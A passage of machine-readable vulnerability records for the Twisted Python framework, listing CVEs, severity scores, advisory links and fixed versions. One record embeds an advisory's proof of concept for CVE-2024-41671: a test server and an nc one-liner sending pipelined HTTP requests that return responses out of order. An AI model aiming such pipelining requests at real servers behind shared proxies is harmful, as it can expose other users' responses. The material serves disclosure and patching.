url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D/
16
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL
17
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL/
18
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D
19
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D/
20
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-10108
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:N/C:P/I:P/A:P
1
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-10108
21
reference_url https://security.gentoo.org/glsa/202007-24
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://security.gentoo.org/glsa/202007-24
22
reference_url https://usn.ubuntu.com/4308-1
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4308-1
23
reference_url https://usn.ubuntu.com/4308-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4308-1/
24
reference_url https://usn.ubuntu.com/4308-2
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4308-2
25
reference_url https://usn.ubuntu.com/4308-2/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4308-2/
26
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
27
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1813439
reference_id 1813439
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1813439
28
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=953950
reference_id 953950
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=953950
29
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*
30
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:twisted:twisted:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:twisted:twisted:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:twisted:twisted:*:*:*:*:*:*:*:*
31
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*
reference_id cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*
32
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*
reference_id cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*
33
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
reference_id cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
34
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*
reference_id cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*
35
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
36
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
reference_id cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
37
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
reference_id cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
38
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*
reference_id cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*
39
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:oracle:solaris:11:*:*:*:*:*:*:*
reference_id cpe:2.3:o:oracle:solaris:11:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:oracle:solaris:11:*:*:*:*:*:*:*
40
reference_url https://access.redhat.com/errata/RHSA-2020:1561
reference_id RHSA-2020:1561
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1561
41
reference_url https://access.redhat.com/errata/RHSA-2020:1962
reference_id RHSA-2020:1962
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1962
fixed_packages
0
url pkg:pypi/twisted@20.3.0rc1
purl pkg:pypi/twisted@20.3.0rc1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-562c-1hjs-hqau
1
vulnerability VCID-7d7z-nhf1-kyhc
2
vulnerability VCID-qc7c-e5fb-77f1
3
vulnerability VCID-qtwh-as1r-6ka5
4
vulnerability VCID-rzad-s8tu-47gm
5
vulnerability VCID-tec3-uqmg-tueq
6
vulnerability VCID-vcw1-fzw7-43f5
7
vulnerability VCID-vz8r-fhqf-zudf
8
vulnerability VCID-y7f5-9nmg-w7b3
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@20.3.0rc1
1
url pkg:pypi/twisted@20.3.0
purl pkg:pypi/twisted@20.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-562c-1hjs-hqau
1
vulnerability VCID-qc7c-e5fb-77f1
2
vulnerability VCID-rzad-s8tu-47gm
3
vulnerability VCID-tec3-uqmg-tueq
4
vulnerability VCID-vz8r-fhqf-zudf
5
vulnerability VCID-y7f5-9nmg-w7b3
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@20.3.0
aliases CVE-2020-10108, GHSA-h96w-mmrf-2h6v, PYSEC-2020-259
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vcw1-fzw7-43f5
11
url VCID-vz8r-fhqf-zudf
vulnerability_id VCID-vz8r-fhqf-zudf
summary 
twisted.web has disordered HTTP pipeline response
### Summary

The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.

### PoC
0. Start a fresh Debian container:
```sh
docker run --workdir /repro --rm -it debian:bookworm-slim
```
1. Install twisted and its dependencies:
```sh
apt -y update && apt -y install ncat git python3 python3-pip \
    && git clone --recurse-submodules https://github.com/twisted/twisted \
    && cd twisted \
    && pip3 install --break-system-packages .
```
2. Run a twisted.web HTTP server that echos received requests' methods. e.g., the following:
```python
from twisted.web import server, resource
from twisted.internet import reactor

class TheResource(resource.Resource):
    isLeaf = True

    def render_GET(self, request) -> bytes:
        return b"GET"

    def render_POST(self, request) -> bytes:
        return b"POST"

site = server.Site(TheResource())
reactor.listenTCP(80, site)
reactor.run()
```
3. Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection:
```sh
(printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80
```
4. Observe that the responses arrive out of order:
```
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:41 GMT
Content-Length: 5
Content-Type: text/html

POST
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 4
Content-Type: text/html

GET
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 5
Content-Type: text/html

POST
```

### Impact
See [GHSA-xc8x-vp79-p3wm](https://github.com/twisted/twisted/security/advisories/GHSA-xc8x-vp79-p3wm). Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-41671
reference_id
reference_type
scores
0
value 0.00098
scoring_system epss
scoring_elements 0.27164
published_at 2026-04-02T12:55:00Z
1
value 0.00098
scoring_system epss
scoring_elements 0.27107
published_at 2026-04-09T12:55:00Z
2
value 0.00098
scoring_system epss
scoring_elements 0.27061
published_at 2026-04-08T12:55:00Z
3
value 0.00098
scoring_system epss
scoring_elements 0.26992
published_at 2026-04-07T12:55:00Z
4
value 0.00098
scoring_system epss
scoring_elements 0.272
published_at 2026-04-04T12:55:00Z
5
value 0.00108
scoring_system epss
scoring_elements 0.29021
published_at 2026-04-13T12:55:00Z
6
value 0.00108
scoring_system epss
scoring_elements 0.29072
published_at 2026-04-12T12:55:00Z
7
value 0.00108
scoring_system epss
scoring_elements 0.29116
published_at 2026-04-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-41671
1
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41671
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41671
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/twisted/twisted
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted
4
reference_url https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-29T18:59:07Z/
url https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33
5
reference_url https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-29T18:59:07Z/
url https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc
6
reference_url https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-29T18:59:07Z/
url https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7
7
reference_url https://lists.debian.org/debian-lts-announce/2024/11/msg00028.html
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2024/11/msg00028.html
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-41671
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-41671
9
reference_url https://www.vicarius.io/vsociety/posts/disordered-http-pipeline-in-twistedweb-cve-2024-4167
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.vicarius.io/vsociety/posts/disordered-http-pipeline-in-twistedweb-cve-2024-4167
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1077679
reference_id 1077679
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1077679
11
reference_url https://github.com/advisories/GHSA-c8m8-j448-xjx7
reference_id GHSA-c8m8-j448-xjx7
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-c8m8-j448-xjx7
12
reference_url https://usn.ubuntu.com/6988-1/
reference_id USN-6988-1
reference_type
scores
url https://usn.ubuntu.com/6988-1/
13
reference_url https://usn.ubuntu.com/6988-2/
reference_id USN-6988-2
reference_type
scores
url https://usn.ubuntu.com/6988-2/
fixed_packages
0
url pkg:pypi/twisted@24.7.0rc1
purl pkg:pypi/twisted@24.7.0rc1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@24.7.0rc1
aliases CVE-2024-41671, GHSA-c8m8-j448-xjx7
risk_score 3.8
exploitability 0.5
weighted_severity 7.5
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vz8r-fhqf-zudf
12
url VCID-y7f5-9nmg-w7b3
vulnerability_id VCID-y7f5-9nmg-w7b3
summary Twisted is an event-based framework for internet applications. Prior to version 23.10.0rc1, when sending multiple HTTP requests in one TCP packet, twisted.web will process the requests asynchronously without guaranteeing the response order. If one of the endpoints is controlled by an attacker, the attacker can delay the response on purpose to manipulate the response of the second request when a victim launched two requests using HTTP pipeline. Version 23.10.0rc1 contains a patch for this issue.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-46137.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-46137.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-46137
reference_id
reference_type
scores
0
value 0.00594
scoring_system epss
scoring_elements 0.69261
published_at 2026-04-04T12:55:00Z
1
value 0.00594
scoring_system epss
scoring_elements 0.69242
published_at 2026-04-02T12:55:00Z
2
value 0.00666
scoring_system epss
scoring_elements 0.71226
published_at 2026-04-08T12:55:00Z
3
value 0.00666
scoring_system epss
scoring_elements 0.71263
published_at 2026-04-11T12:55:00Z
4
value 0.00666
scoring_system epss
scoring_elements 0.71241
published_at 2026-04-09T12:55:00Z
5
value 0.00666
scoring_system epss
scoring_elements 0.71249
published_at 2026-04-12T12:55:00Z
6
value 0.00666
scoring_system epss
scoring_elements 0.71184
published_at 2026-04-07T12:55:00Z
7
value 0.00666
scoring_system epss
scoring_elements 0.71233
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-46137
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46137
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46137
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2023-224.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2023-224.yaml
5
reference_url https://github.com/twisted/twisted
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted
6
reference_url https://github.com/twisted/twisted/security/advisories/GHSA-xc8x-vp79-p3wm
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-10T13:57:52Z/
url https://github.com/twisted/twisted/security/advisories/GHSA-xc8x-vp79-p3wm
7
reference_url https://lists.debian.org/debian-lts-announce/2024/11/msg00028.html
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2024/11/msg00028.html
8
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1054913
reference_id 1054913
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1054913
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2246264
reference_id 2246264
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2246264
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-46137
reference_id CVE-2023-46137
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-46137
11
reference_url https://github.com/advisories/GHSA-xc8x-vp79-p3wm
reference_id GHSA-xc8x-vp79-p3wm
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xc8x-vp79-p3wm
12
reference_url https://access.redhat.com/errata/RHSA-2024:0322
reference_id RHSA-2024:0322
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:0322
13
reference_url https://access.redhat.com/errata/RHSA-2024:1516
reference_id RHSA-2024:1516
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1516
14
reference_url https://access.redhat.com/errata/RHSA-2024:1518
reference_id RHSA-2024:1518
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1518
15
reference_url https://usn.ubuntu.com/6575-1/
reference_id USN-6575-1
reference_type
scores
url https://usn.ubuntu.com/6575-1/
fixed_packages
0
url pkg:pypi/twisted@23.10.0rc1
purl pkg:pypi/twisted@23.10.0rc1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-562c-1hjs-hqau
1
vulnerability VCID-vz8r-fhqf-zudf
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@23.10.0rc1
aliases CVE-2023-46137, GHSA-xc8x-vp79-p3wm, PYSEC-2023-224
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-y7f5-9nmg-w7b3
13
url VCID-zx5n-czhy-6qgu
vulnerability_id VCID-zx5n-czhy-6qgu
summary In Twisted before 19.2.1, twisted.web did not validate or sanitize URIs or HTTP methods, allowing an attacker to inject invalid characters such as CRLF.
references
0
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00030.html
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00030.html
1
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00042.html
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00042.html
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12387.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12387.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2019-12387
reference_id
reference_type
scores
0
value 0.00521
scoring_system epss
scoring_elements 0.66831
published_at 2026-04-04T12:55:00Z
1
value 0.00521
scoring_system epss
scoring_elements 0.66807
published_at 2026-04-02T12:55:00Z
2
value 0.00521
scoring_system epss
scoring_elements 0.66768
published_at 2026-04-01T12:55:00Z
3
value 0.00521
scoring_system epss
scoring_elements 0.66873
